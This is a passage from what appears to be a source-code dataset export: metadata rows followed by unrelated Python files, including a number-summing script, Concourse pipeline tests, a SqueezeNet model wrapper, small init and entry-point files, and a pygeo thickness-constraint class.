25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
""".strip()
numbers = [int(row) for row in data.split("\n")]
# Python makes this question way too easy!
s = sum(numbers)
d = str(s)[:10]
print(d)
| 47.387387
| 50
| 0.969011
| 127
| 5,260
| 40.133858
| 0.96063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.974859
| 0.024525
| 5,260
| 110
| 51
| 47.818182
| 0.018515
| 0.007605
| 0
| 0
| 0
| 0
| 0.977961
| 0.958222
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.009434
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d02b19e0923b347aa2ea952bf51ed6b8b81876f
| 7,083
|
py
|
Python
|
tests/set_pipelines_test.py
|
Anthonyhawkins/concourse-kit
|
59c33b9d78480cc0acf32a06aac3b423621ab79f
|
[
"MIT"
] | null | null | null |
tests/set_pipelines_test.py
|
Anthonyhawkins/concourse-kit
|
59c33b9d78480cc0acf32a06aac3b423621ab79f
|
[
"MIT"
] | null | null | null |
tests/set_pipelines_test.py
|
Anthonyhawkins/concourse-kit
|
59c33b9d78480cc0acf32a06aac3b423621ab79f
|
[
"MIT"
] | null | null | null |
from unittest import mock
from unittest.mock import Mock
from unittest.mock import patch
import pytest
import sys
import os
from concoursekit import set_pipelines
from concoursekit import load_config
@patch("concoursekit.fly_run")
def test_set_pipelines_with_one_env(mock_fly_run):
cck_config = load_config()
set_pipelines(
environments=["dev"],
all_flag=True,
cck_config=cck_config,
plan_flag=False
)
mock_fly_run.assert_has_calls([
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-bar-mgmt', '--config', 'dev-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-baz-mgmt', '--config', 'dev-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'dev-foo-mgmt-install', '--config', 'dev-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'dev-foo-mgmt-install'])
], any_order=True)
@patch("concoursekit.fly_run")
def test_set_pipelines_with_two_env(mock_fly_run):
cck_config = load_config()
set_pipelines(
environments=["dev", "stage"],
all_flag=True,
cck_config=cck_config,
plan_flag=False
)
mock_fly_run.assert_has_calls([
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-bar-mgmt', '--config', 'dev-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-bar-mgmt', '--config', 'stage-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'stage-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-baz-mgmt', '--config', 'dev-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-baz-mgmt', '--config', 'stage-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'stage-baz-mgmt']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'dev-foo-mgmt-install', '--config', 'dev-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'stage-foo-mgmt-install', '--config', 'stage-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'stage-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'stage-foo-mgmt-install'])
], any_order=True)
@patch("concoursekit.fly_run")
def test_set_pipelines_without_envs(mock_fly_run):
    """Excluding an environment with a "!" prefix flies all other environments.

    With ``environments=["!sandbox"]`` and ``all_flag=True``, set_pipelines is
    expected to fly every configured pipeline for every environment EXCEPT
    sandbox.  Each flown pipeline produces three fly invocations:
    set-pipeline, hide-pipeline, and pause-/unpause-pipeline (which of the
    latter two depends on the pipeline's configuration).
    """
    cck_config = load_config()
    set_pipelines(
        environments=["!sandbox"],
        all_flag=True,
        cck_config=cck_config,
        plan_flag=False
    )
    # any_order=True: only membership of the calls matters, not their order.
    # NOTE(review): assert_has_calls does not forbid EXTRA calls, so an
    # accidental sandbox invocation would not be caught here — confirm that
    # is acceptable for this suite.
    mock_fly_run.assert_has_calls([
        mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-bar-mgmt', '--config', 'dev-bar-mgmt.yml']),
        mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-bar-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'dev-bar-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'prod-bar-mgmt', '--config', 'prod-bar-mgmt.yml']),
        mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'prod-bar-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'prod-bar-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-bar-mgmt', '--config', 'stage-bar-mgmt.yml']),
        mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-bar-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'stage-bar-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-baz-mgmt', '--config', 'dev-baz-mgmt.yml', '--non-interactive']),
        mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-baz-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'dev-baz-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'prod-baz-mgmt', '--config', 'prod-baz-mgmt.yml', '--non-interactive']),
        mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'prod-baz-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'prod-baz-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-baz-mgmt', '--config', 'stage-baz-mgmt.yml', '--non-interactive']),
        mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-baz-mgmt']),
        mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'stage-baz-mgmt']),
        mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'dev-foo-mgmt-install', '--config', 'dev-foo-mgmt-install.yml', '--non-interactive']),
        mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
        mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
        mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'stage-foo-mgmt-install', '--config', 'stage-foo-mgmt-install.yml', '--non-interactive']),
        mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'stage-foo-mgmt-install']),
        mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'stage-foo-mgmt-install']),
        mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'prod-foo-mgmt-install', '--config', 'prod-foo-mgmt-install.yml', '--non-interactive']),
        mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'prod-foo-mgmt-install']),
        mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'prod-foo-mgmt-install']),
        # zoo is only configured for its dedicated stage team and gets no
        # hide/unpause calls (per the visible expectations here).
        mock.call(['fly', '-t', 'my-team-stage', 'set-pipeline', '--pipeline', 'stage-zoo-mgmt-install-stage', '--config', 'stage-zoo-mgmt-install-stage.yml']),
    ], any_order=True)
| 66.820755
| 161
| 0.607934
| 943
| 7,083
| 4.501591
| 0.060445
| 0.103651
| 0.142521
| 0.155477
| 0.949117
| 0.934511
| 0.915194
| 0.915194
| 0.915194
| 0.903416
| 0
| 0
| 0.10377
| 7,083
| 106
| 162
| 66.820755
| 0.668715
| 0
| 0
| 0.6875
| 0
| 0
| 0.518492
| 0.05703
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0.03125
| false
| 0
| 0.083333
| 0
| 0.114583
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d5cf1631c30a614aa6de76de6a9e79b8d565286
| 32
|
py
|
Python
|
aiproteomics/rt/datasets/__init__.py
|
ai-proteomics/aiproteomics
|
125aed4b3528bfd40349ef932034d9532ab969c3
|
[
"Apache-2.0"
] | null | null | null |
aiproteomics/rt/datasets/__init__.py
|
ai-proteomics/aiproteomics
|
125aed4b3528bfd40349ef932034d9532ab969c3
|
[
"Apache-2.0"
] | 14
|
2022-03-30T19:49:30.000Z
|
2022-03-31T11:39:27.000Z
|
aiproteomics/rt/datasets/__init__.py
|
ai-proteomics/aiproteomics
|
125aed4b3528bfd40349ef932034d9532ab969c3
|
[
"Apache-2.0"
] | null | null | null |
from . import AIProteomicsHela1
| 16
| 31
| 0.84375
| 3
| 32
| 9
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1864f0f352df51dde8cedb5d0c2bfa627f9b2e93
| 161
|
py
|
Python
|
jumpscale/clients/syncthing/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 13
|
2020-09-02T09:05:08.000Z
|
2022-03-12T02:43:24.000Z
|
jumpscale/clients/syncthing/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 1,998
|
2020-06-15T11:46:10.000Z
|
2022-03-24T22:12:41.000Z
|
jumpscale/clients/syncthing/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 8
|
2020-09-29T06:50:35.000Z
|
2021-06-14T03:30:52.000Z
|
def export_module_as():
    """Return the jumpscale StoredFactory that wraps SyncthingClient.

    Imports are kept local so the factory machinery is only loaded when the
    module is actually exported.
    """
    from .syncthing import SyncthingClient
    from jumpscale.core.base import StoredFactory

    factory = StoredFactory(SyncthingClient)
    return factory
| 23
| 49
| 0.78882
| 17
| 161
| 7.352941
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161491
| 161
| 6
| 50
| 26.833333
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a10617704e4d9fc613fdf949c90f383e74b505a6
| 41
|
py
|
Python
|
part2/__init__.py
|
gdhGaoFei/Python01
|
a9fef5290479d575725e2ddbb83c5f2d192606c6
|
[
"MIT"
] | 1
|
2019-06-22T23:27:48.000Z
|
2019-06-22T23:27:48.000Z
|
part2/__init__.py
|
gdhGaoFei/Python01
|
a9fef5290479d575725e2ddbb83c5f2d192606c6
|
[
"MIT"
] | null | null | null |
part2/__init__.py
|
gdhGaoFei/Python01
|
a9fef5290479d575725e2ddbb83c5f2d192606c6
|
[
"MIT"
] | null | null | null |
from part1 import *
print("part2 ่ขซๅฏผๅ
ฅไบ ")
| 13.666667
| 20
| 0.707317
| 6
| 41
| 4.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.170732
| 41
| 3
| 20
| 13.666667
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0.261905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
a1179d08af4684bdc6f96b83be24ae08eccb306c
| 3,130
|
py
|
Python
|
models/resnet.py
|
kreimanlab/AugMem
|
cb0e8d39eb0c469da46c7c550c19229927a2bec5
|
[
"MIT"
] | 6
|
2021-04-07T15:17:24.000Z
|
2021-07-07T04:37:29.000Z
|
models/resnet.py
|
kreimanlab/AugMem
|
cb0e8d39eb0c469da46c7c550c19229927a2bec5
|
[
"MIT"
] | null | null | null |
models/resnet.py
|
kreimanlab/AugMem
|
cb0e8d39eb0c469da46c7c550c19229927a2bec5
|
[
"MIT"
] | null | null | null |
'''
Implementation of resnet-18
'''
import torchvision.models as models
import torch.nn as nn
#class ResNet18(nn.Module):
#
# def __init__(self, model_config):
# self.config = model_config
# super(ResNet18, self).__init__()
#
# self.model = models.resnet18(pretrained = self.config['pretrained'])
#
# # freezing weights for feature extraction if desired
# if self.config['freeze_feature_extract']:
# for param in self.model.parameters():
# param.requires_grad = False
#
# if self.config['n_class'] is not None:
# print("Changing output layer to contain {} classes".format(self.config['n_class']))
# self.model.fc = nn.Linear(512, self.config['n_class'])
#
#
# def forward(self, x):
# out = self.model(x)
# return(out)
#class ResNet18(nn.Module):
#
# def __init__(self, model_config):
# self.config = model_config
# super(ResNet18, self).__init__()
#
# self.tempmodel = models.vgg16(pretrained = self.config['pretrained'])
#
# if self.config['n_class'] is not None:
# print("Changing output layer to contain {} classes".format(self.config['n_class']))
# self.model = nn.Sequential(self.tempmodel.features,
# self.tempmodel.avgpool,
# nn.Flatten(),
# *(list(self.tempmodel.classifier)[0:-1]),
# nn.Linear(4096, self.config['n_class']))
# else:
# self.model = nn.Sequential(self.tempmodel.features,
# self.tempmodel.avgpool,
# nn.Flatten(),
# self.tempmodel.classifier)
#
# # freezing weights for feature extraction if desired
# if self.config['freeze_feature_extract']:
# for param in self.model.parameters():
# param.requires_grad = False
#
#
# def forward(self, x):
# out = self.model(x)
# return(out)
class ResNet18(nn.Module):
    """Image-classification wrapper used by the experiment configs.

    NOTE(review): despite the class name, this currently builds a torchvision
    ``squeezenet1_0`` backbone (the name is kept so existing configs/callers
    keep working) — confirm this is intentional.
    """

    def __init__(self, model_config):
        self.config = model_config
        super(ResNet18, self).__init__()

        backbone = models.squeezenet1_0(pretrained=self.config['pretrained'])

        # Freeze every backbone weight when pure feature extraction is wanted.
        # The classifier conv swapped in below is created afterwards and so
        # stays trainable.
        if self.config['freeze_feature_extract']:
            for weight in backbone.parameters():
                weight.requires_grad = False

        if self.config['n_class'] is not None:
            print("Changing output layer to contain {} classes".format(self.config['n_class']))
            # SqueezeNet's classifier[1] is the final conv producing class
            # maps; replace it to emit n_class channels (3x3, pad 1 keeps the
            # spatial size unchanged).
            backbone.classifier[1] = nn.Conv2d(512, self.config['n_class'], (3, 3), stride=(1, 1), padding=(1, 1))

        self.model = backbone
        # Flatten the (N, C, 1, 1) class map into (N, C) logits.
        self.model = nn.Sequential(self.model, nn.Flatten())

    def forward(self, x):
        out = self.model(x)
        return out
| 37.710843
| 116
| 0.532907
| 327
| 3,130
| 4.95107
| 0.217125
| 0.11118
| 0.061149
| 0.088944
| 0.822112
| 0.7832
| 0.7832
| 0.7832
| 0.7832
| 0.7832
| 0
| 0.019579
| 0.347284
| 3,130
| 82
| 117
| 38.170732
| 0.772883
| 0.670927
| 0
| 0
| 0
| 0
| 0.099174
| 0.022727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.352941
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a13da8f040aa8c7fcac1087553566ff2363f4dfc
| 201
|
py
|
Python
|
mosdef_gomc/__init__.py
|
GOMC-WSU/MoSDeF-GOMC
|
6cd58531c4f2fc575938d98373401a94b843e4bd
|
[
"MIT"
] | 2
|
2022-03-23T18:46:40.000Z
|
2022-03-28T22:34:24.000Z
|
mosdef_gomc/__init__.py
|
GOMC-WSU/MoSDeF-GOMC
|
6cd58531c4f2fc575938d98373401a94b843e4bd
|
[
"MIT"
] | 2
|
2022-03-28T22:41:50.000Z
|
2022-03-28T23:22:34.000Z
|
mosdef_gomc/__init__.py
|
GOMC-WSU/MoSDeF-GOMC
|
6cd58531c4f2fc575938d98373401a94b843e4bd
|
[
"MIT"
] | 1
|
2022-03-22T23:49:24.000Z
|
2022-03-22T23:49:24.000Z
|
"""mBuild: a hierarchical, component based molecule builder."""
from mosdef_gomc.formats.charmm_writer import Charmm
from mosdef_gomc.formats.gomc_conf_writer import GOMCControl
__version__ = "0.1.0"
| 33.5
| 63
| 0.81592
| 28
| 201
| 5.535714
| 0.678571
| 0.129032
| 0.180645
| 0.270968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016484
| 0.094527
| 201
| 5
| 64
| 40.2
| 0.835165
| 0.283582
| 0
| 0
| 0
| 0
| 0.036232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a1c5e3ced1d8ca612c8488e541b2d5584cad1f52
| 29
|
py
|
Python
|
python/darknet/core/__init__.py
|
elsampsa/darknet-python
|
6c62a5934082157154087809d67d0ee43384cc7a
|
[
"MIT"
] | 10
|
2019-05-10T07:26:56.000Z
|
2021-04-22T18:59:12.000Z
|
python/darknet/core/__init__.py
|
elsampsa/darknet-python
|
6c62a5934082157154087809d67d0ee43384cc7a
|
[
"MIT"
] | null | null | null |
python/darknet/core/__init__.py
|
elsampsa/darknet-python
|
6c62a5934082157154087809d67d0ee43384cc7a
|
[
"MIT"
] | 4
|
2018-11-16T00:55:41.000Z
|
2020-09-29T03:44:28.000Z
|
from .darknet_core import *
| 14.5
| 28
| 0.758621
| 4
| 29
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 29
| 1
| 29
| 29
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b80a160b55eb567826ffac5d12122b08836324c6
| 138
|
py
|
Python
|
main.py
|
likelion/script.tubecast
|
33c6bd7f87dfdca3e86a0dc2239a31d3f43a0450
|
[
"MIT"
] | 83
|
2018-03-16T21:42:59.000Z
|
2022-03-13T20:51:41.000Z
|
main.py
|
likelion/script.tubecast
|
33c6bd7f87dfdca3e86a0dc2239a31d3f43a0450
|
[
"MIT"
] | 52
|
2018-03-29T01:35:10.000Z
|
2022-03-01T15:48:24.000Z
|
main.py
|
likelion/script.tubecast
|
33c6bd7f87dfdca3e86a0dc2239a31d3f43a0450
|
[
"MIT"
] | 34
|
2018-03-28T13:58:46.000Z
|
2021-12-06T11:13:48.000Z
|
# -*- coding: utf-8 -*-
# Entry point for the Kodi service add-on: wire up logging, then run the
# service loop.
from resources.lib import service
from resources.lib.kodi import kodilogging

# Configure the add-on's logging before the service starts.
kodilogging.config()
# NOTE(review): presumably blocks for the lifetime of the Kodi service —
# confirm against service.run()'s implementation.
service.run()
| 17.25
| 42
| 0.746377
| 18
| 138
| 5.722222
| 0.666667
| 0.252427
| 0.31068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 0.123188
| 138
| 7
| 43
| 19.714286
| 0.842975
| 0.152174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b82036dddb6b1959bf0b831a086f6bda29450362
| 72
|
py
|
Python
|
setup.py
|
anaquin135/flaskURL
|
458ca5b2264117f94a4ff68d5395a3d81ec6458b
|
[
"MIT"
] | null | null | null |
setup.py
|
anaquin135/flaskURL
|
458ca5b2264117f94a4ff68d5395a3d81ec6458b
|
[
"MIT"
] | null | null | null |
setup.py
|
anaquin135/flaskURL
|
458ca5b2264117f94a4ff68d5395a3d81ec6458b
|
[
"MIT"
] | null | null | null |
# One-shot script: create the application's database tables.
from flaskURL import db
# NOTE(review): URL is imported for its side effect of registering the model
# with db's metadata so create_all() sees its table — confirm.
from flaskURL.models import URL

db.create_all()
| 18
| 31
| 0.819444
| 12
| 72
| 4.833333
| 0.666667
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 72
| 4
| 32
| 18
| 0.920635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
62c504618cd99786ac886c55e14f2395d4a6422e
| 6,884
|
py
|
Python
|
pygeo/constraints/thicknessConstraint.py
|
jrram/pygeo
|
ed15c848703a90055d38130b6d05cef8080a9d68
|
[
"Apache-2.0"
] | null | null | null |
pygeo/constraints/thicknessConstraint.py
|
jrram/pygeo
|
ed15c848703a90055d38130b6d05cef8080a9d68
|
[
"Apache-2.0"
] | null | null | null |
pygeo/constraints/thicknessConstraint.py
|
jrram/pygeo
|
ed15c848703a90055d38130b6d05cef8080a9d68
|
[
"Apache-2.0"
] | null | null | null |
# ======================================================================
# Imports
# ======================================================================
import numpy as np
from .. import geo_utils
from .baseConstraint import GeometricConstraint
class ThicknessConstraint(GeometricConstraint):
    """
    DVConstraints representation of a set of thickness
    constraints. One of these objects is created each time a
    addThicknessConstraints2D or addThicknessConstraints1D call is
    made. The user should not have to deal with this class directly.

    Each constraint i is the Euclidean distance between the coordinate
    pair ``coords[2*i]`` and ``coords[2*i + 1]``, optionally scaled by
    its initial value so the constraint value starts at 1.
    """

    def __init__(self, name, coords, lower, upper, scaled, scale, DVGeo, addToPyOpt, compNames):
        # coords holds point PAIRS, so the number of constraints is
        # len(coords) // 2 (forwarded to the base class as nCon).
        super().__init__(name, len(coords) // 2, lower, upper, scale, DVGeo, addToPyOpt)
        self.coords = coords
        self.scaled = scaled  # True -> report D/D0 instead of absolute distance

        # First thing we can do is embed the coordinates into DVGeo
        # with the name provided:
        self.DVGeo.addPointSet(self.coords, self.name, compNames=compNames)

        # Now get the reference lengths (initial thickness of each pair),
        # used as the denominator when self.scaled is True.
        self.D0 = np.zeros(self.nCon)
        for i in range(self.nCon):
            self.D0[i] = np.linalg.norm(self.coords[2 * i] - self.coords[2 * i + 1])

    def evalFunctions(self, funcs, config):
        """
        Evaluate the functions this object has and place in the funcs dictionary

        Parameters
        ----------
        funcs : dict
            Dictionary to place function values
        """
        # Pull out the most recent set of coordinates:
        self.coords = self.DVGeo.update(self.name, config=config)
        D = np.zeros(self.nCon)
        for i in range(self.nCon):
            D[i] = np.linalg.norm(self.coords[2 * i] - self.coords[2 * i + 1])
            if self.scaled:
                # Normalize by the reference length captured in __init__.
                D[i] /= self.D0[i]
        funcs[self.name] = D

    def evalFunctionsSens(self, funcsSens, config):
        """
        Evaluate the sensitivity of the functions this object has and
        place in the funcsSens dictionary

        Parameters
        ----------
        funcsSens : dict
            Dictionary to place function values
        """
